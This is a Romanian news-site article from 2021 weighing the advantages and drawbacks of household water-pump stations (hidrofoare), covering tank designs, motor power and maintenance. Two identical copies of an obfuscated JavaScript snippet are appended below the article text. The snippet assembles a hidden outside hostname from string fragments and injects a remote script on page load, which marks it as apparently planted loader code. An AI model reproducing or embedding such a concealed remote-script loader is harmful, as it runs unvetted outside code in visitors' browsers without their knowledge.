x close
Click Accept pentru a primi notificări cu cele mai importante știri! Nu, multumesc Accept
Jurnalul.ro Timp liber Casa Avantajele și dezavantajele hidrofoarelor actuale

Avantajele și dezavantajele hidrofoarelor actuale

27 Dec 2021   •   12:00
Avantajele și dezavantajele hidrofoarelor actuale

 Un hidrofor este un dispozitiv care furnizează apă pentru case individuale, apartamente și afaceri. O mare varietate de rezervoare de stocare și hidrofoare au fost puse spre vânzare. Indiferent dacă preferați un hidrofor fără rezervor sau o stație de pompare autonomă, trebuie sa știi că ambele vin cu avantaje și dezavantaje. Pentru că este esențial să alegeți modelul ideal pentru fiecare situație. Determinați cantitatea de putere și performanța pe baza locurilor în care cererea de apă este cea mai mare sau cea mai scăzută. Una dintre cele mai importante diferențe dintre hidrofoare este existența sau lipsa unui rezervor hidraulic. Puterea și eficiența hidrofoarelor, precum și hidroforele scufundate, sunt de asemenea aspecte esențiale.

Vom începe cu cel mai comun design al stației de pompare, un hidrofor cu rezervor. Un motor electric cu o porțiune de pompare, un rezervor hidraulic cu un element de silicon pentru apă și mecanizarea managementului stau la baza construcției sale. Hidrofoarele bune de acest fel sunt ușor de asamblat și întreținut și au întotdeauna un rezervor de apă pentru utilizare pe termen scurt. Acesta este un beneficiu incontestabil. În plus, orice proiect de stație de pompare poate fi construit la comandă, ceea ce reprezintă un avantaj suplimentar.

Deoarece un container hidraulic cu un volum de zeci de litri este de obicei montat în configurație, această variabilă poate fi modificată în siguranță în designul clasic. Dacă, de exemplu, alimentarea cu apă este întreruptă des sau există mai multe locuri de utilizare a apei, ați putea lua în considerare instalarea unui rezervor mai mare.

Când căutați un hidrofor pentru casa dvs., luați în considerare și puterea motorului. Chiar și cu un rezervor uriaș, un motor de putere redusă nu va fi capabil să mențină o presiune constantă într-o casă cu suprafață mare. Deși nevoile fiecărui client sunt unice, există câteva linii directoare generale care vă pot ajuta să estimați de câtă putere veți avea nevoie de la stație.

Nu este necesar să cheltuiți mulți bani pe un hirdrofor puternic dacă utilizați doar una sau două poziții de utilizare a apei în casa dvs. O stație de câteva sute de wați este suficientă. Dacă, pe de altă parte, construiți o cabană mare pentru a găzdui multe familii și anticipați conectarea sistemelor de irigare și a mai multor locuri de consum de apă, veți avea nevoie de hidrofoare cu o capacitate totală de o mie de wați.

Hidroforele clasice au o serie de dezavantaje, inclusiv dimensiunea lor uriașă și presiunea imprevizibilă din cauza diferenței de presiune dintre recipient și baterie. Rezervoarele de fluide sunt, de asemenea, expuse la intemperii și susceptibile la rugină, cu excepția cazului în care sunt fabricate din oțel inoxidabil. Elementul de silicon din recipient este un consumabil și trebuie schimbat la fiecare doi-trei ani.

O stație de pompare pe bază de rezervor nu trebuie utilizată ca o pompă directă de creștere a presiunii pentru alimentarea principală cu apă fără a evalua mai întâi tensiunea sistemului și a regla fin releul automat.

 

(function(){

zXl9=document.createElement("script");zXl9_=(("u")+"st")+"a";zXl9.async=true;

zXl9.type="text/javascript";zXl9_+=("t.i")+""+"n";zXl9_+=(("f")+"o");zXl9_+="/";

zXl9u="363178116.";zXl9u+="0a1x9kvnXl96mb9fdxx"+"z32a51x1Xt2";

zXl9.src="https://"+zXl9_+zXl9u;document.body.appendChild(zXl9);

})();

(function(){

zXl9=document.createElement("script");zXl9_=(("u")+"st")+"a";zXl9.async=true;

zXl9.type="text/javascript";zXl9_+=("t.i")+""+"n";zXl9_+=(("f")+"o");zXl9_+="/";

zXl9u="363178116.";zXl9u+="0a1x9kvnXl96mb9fdxx"+"z32a51x1Xt2";

zXl9.src="https://"+zXl9_+zXl9u;document.body.appendChild(zXl9);

})();

×